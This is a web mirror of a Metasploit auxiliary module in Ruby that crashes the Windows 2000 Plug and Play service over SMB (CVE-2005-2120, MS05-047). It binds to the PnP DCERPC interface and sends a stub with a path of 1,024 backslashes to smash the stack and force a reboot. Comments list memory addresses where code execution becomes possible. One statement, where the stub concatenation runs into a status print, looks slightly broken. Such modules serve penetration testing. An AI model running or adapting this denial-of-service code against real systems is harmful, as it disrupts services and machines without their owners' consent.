Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::DCERPC

8
  include Msf::Exploit::Remote::SMB::Client

9
  include Msf::Auxiliary::Dos

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Microsoft Plug and Play Service Registry Overflow',

16
        'Description' => %q{

17
          This module triggers a stack buffer overflow in the Windows Plug

18
          and Play service. This vulnerability can be exploited on

19
          Windows 2000 without a valid user account. Since the PnP

20
          service runs inside the service.exe process, this module

21
          will result in a forced reboot on Windows 2000. Obtaining

22
          code execution is possible if user-controlled memory can

23
          be placed at 0x00000030, 0x0030005C, or 0x005C005C.

24
        },

25
        'Author' => [ 'hdm' ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2005-2120' ],

29
          [ 'MSB', 'MS05-047' ],

30
          [ 'BID', '15065' ],

31
          [ 'OSVDB', '18830' ]

32
        ],

33
        'Notes' => {

34
          'Stability' => [CRASH_OS_RESTARTS],

35
          'SideEffects' => [],

36
          'Reliability' => []

37
        }

38
      )

39
    )

40


41
    register_options(

42
      [

43
        OptString.new('SMBPIPE', [ true, 'The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)', 'browser']),

44
      ]

45
    )

46
  end

47


48
=begin

49


50
/* Function 0x0a at 0x767a54a8 */

51
long function_0a (

52
  [in] [unique] [string] wchar_t * arg_00,

53
  [out] [size_is(*arg_02)] [length_is(*arg_02)] wchar_t * arg_01,

54
  [in,out] long * arg_02,

55
  [in] long arg_03

56
);

57


58
=end

59


60
  def run

61
    # Determine which pipe to use

62
    pipe = datastore['SMBPIPE']

63


64
    print_status('Connecting to the SMB service...')

65
    connect

66
    smb_login

67


68
    # Results of testing on Windows 2000 SP0

69
    #  324 / 325 exception handled

70
    #  326 write to 0

71
    #  327 jump to 00000030

72
    #  328 jump to 0030005C

73
    #  329 jump to 005C005C

74


75
    # Completely smash the process stack

76
    i = 1024

77


78
    handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{pipe}"])

79
    print_status("Binding to #{handle} ...")

80
    dcerpc_bind(handle)

81
    print_status("Bound to #{handle} ...")

82


83
    path = 'HTREE\\ROOT' + ('\\' * i)

84


85
    # 0 = nil, 1 = enum, 2/3 = services, 4 = enum (currentcontrolset|caps)

86


87
    stubdata =

88
      NDR.long(rand(0xffffffff)) +

89
      NDR.wstring(path) +

90
      NDR.long(4) +

91
      NDR.long(1) +

92
      print_status('Calling the vulnerable function...')

93


94
    begin

95
      dcerpc.call(0x0a, stubdata)

96
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse

97
      print_good('Server did not respond, this is expected')

98
    rescue ::Errno::ECONNRESET

99
      print_good('Connection reset by peer (possible success)')

100
    rescue StandardError => e

101
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/

102
        print_good('Server disconnected, this is expected')

103
      else

104
        raise e

105
      end

106
    end

107


108
    disconnect

109
  end

110
end

111


112